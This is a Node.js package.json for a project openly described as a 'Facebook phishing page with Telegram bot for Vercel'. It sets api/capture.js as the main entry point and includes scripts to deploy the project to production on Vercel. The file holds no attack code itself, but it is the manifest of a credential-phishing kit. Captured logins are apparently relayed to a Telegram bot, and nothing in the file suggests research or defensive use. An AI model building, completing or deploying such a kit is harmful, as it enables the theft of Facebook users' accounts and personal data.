{
  "name": "facebook-phishing-vercel",
  "version": "1.0.0",
  "description": "Facebook phishing page with Telegram bot for Vercel",
  "main": "api/capture.js",
  "scripts": {
    "dev": "vercel dev",
    "deploy": "vercel --prod",
    "start": "node api/capture.js"
  },
  "dependencies": {},
  "devDependencies": {
    "@vercel/node": "^3.0.0"
  },
  "engines": {
    "node": ">=18.x"
  }
}